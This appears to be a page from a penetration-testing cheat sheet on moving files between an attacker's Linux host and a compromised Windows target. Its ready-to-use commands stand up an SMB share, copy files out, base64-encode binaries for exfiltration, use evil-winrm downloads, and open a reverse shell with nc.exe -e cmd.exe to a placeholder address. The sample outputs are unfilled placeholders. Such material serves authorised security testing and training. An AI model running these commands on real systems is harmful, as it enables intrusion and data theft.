Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Start a Local SMB Server
impacket-smbserver share . -smb2support
Sample Output:
TO-DOcmd
# Connect to SMB server without creds
net use \\<LOCAL_IP>\share
Sample Output:
TO-DO# Connect to SMB server with creds
net use \\<LOCAL_IP>\share /u:<USER> '<PASSWORD>'
Sample Output:
TO-DO# From target Windows to local Linux
copy <FILE> \\<LOCAL_IP>\share
Sample Output:
TO-DO# From local Linux to target Windows
copy \\<LOCAL_IP>\share\<FILE> <FILE>
Sample Output:
TO-DO# Delete file
del <FILE>
Sample Output:
TO-DO# Remove SMB share
net use /d \\<LOCAL_IP>\share
Sample Output:
TO-DO# Older Windows (e.g. xp), use directly
\\<LOCAL_IP>\share\nc.exe -e cmd.exe <LOCAL_IP> <LOCAL_PORT>
Sample Output:
TO-DOSmall binary
# In target Windows
[System.convert]::ToBase64String((Get-Content -Path 'C:\ProgramData\<FILE>' -Encoding Byte))
Sample Output:
TO-DO# Copy and paste the base64 encoded binary to local Linux
echo -n '<BASE64_BINARY>' | base64 -d > <FILE>
Sample Output:
TO-DONote: For restricted environment
# Evil-winrm built-in function
download 'C:\ProgramData\<FILE>' '<LOCAL_DEST_PATH>'
Sample Output:
TO-DO